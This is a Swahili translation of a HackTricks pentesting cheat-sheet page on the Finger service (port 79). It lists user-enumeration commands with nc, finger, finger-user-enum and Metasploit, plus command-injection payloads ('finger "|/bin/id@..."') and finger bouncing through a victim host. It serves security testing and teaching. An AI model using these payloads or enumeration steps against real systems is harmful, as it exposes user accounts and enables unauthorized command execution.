mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
79 lines
3.9 KiB
Markdown
79 lines
3.9 KiB
Markdown
# 79 - Kupima Kidole
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
|
|
## **Maelezo Muhimu**
|
|
|
|
Programu/Huduma ya **Kidole** hutumiwa kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, maelezo yanayotolewa ni pamoja na **jina la kuingia la mtumiaji, jina kamili**, na, katika baadhi ya kesi, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alijiunga, kipindi cha kutokuwa na shughuli (muda wa kutokuwa na shughuli), wakati wa mwisho mtumiaji alisoma barua pepe, na maudhui ya faili za mpango na mradi wa mtumiaji.
|
|
|
|
**Bandari ya chaguo-msingi:** 79
|
|
```
|
|
PORT STATE SERVICE
|
|
79/tcp open finger
|
|
```
|
|
## **Uchambuzi**
|
|
|
|
### **Kukamata Bango/Unganisho Msingi**
|
|
```bash
|
|
nc -vn <IP> 79
|
|
echo "root" | nc -vn <IP> 79
|
|
```
|
|
### **Uthibitishaji wa Watumiaji**
|
|
```bash
|
|
finger @<Victim> #List users
|
|
finger admin@<Victim> #Get info of user
|
|
finger user@<Victim> #Get info of user
|
|
```
|
|
Badala yake, unaweza kutumia **finger-user-enum** kutoka [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), baadhi ya mifano:
|
|
```bash
|
|
finger-user-enum.pl -U users.txt -t 10.0.0.1
|
|
finger-user-enum.pl -u root -t 10.0.0.1
|
|
finger-user-enum.pl -U users.txt -T ips.txt
|
|
```
|
|
#### **Nmap inatekeleza script kwa kutumia script za msingi**
|
|
|
|
### Metasploit hutumia mbinu zaidi kuliko Nmap
|
|
```
|
|
use auxiliary/scanner/finger/finger_users
|
|
```
|
|
### Shodan
|
|
|
|
* `port:79 USER`
|
|
|
|
## Utekelezaji wa Amri
|
|
```bash
|
|
finger "|/bin/id@example.com"
|
|
finger "|/bin/ls -a /@example.com"
|
|
```
|
|
## Kupiga Kidole
|
|
|
|
[Tumia mfumo kama kituo cha kupiga kidole](https://securiteam.com/exploits/2BUQ2RFQ0I/)
|
|
```
|
|
finger user@host@victim
|
|
finger @internal@external
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|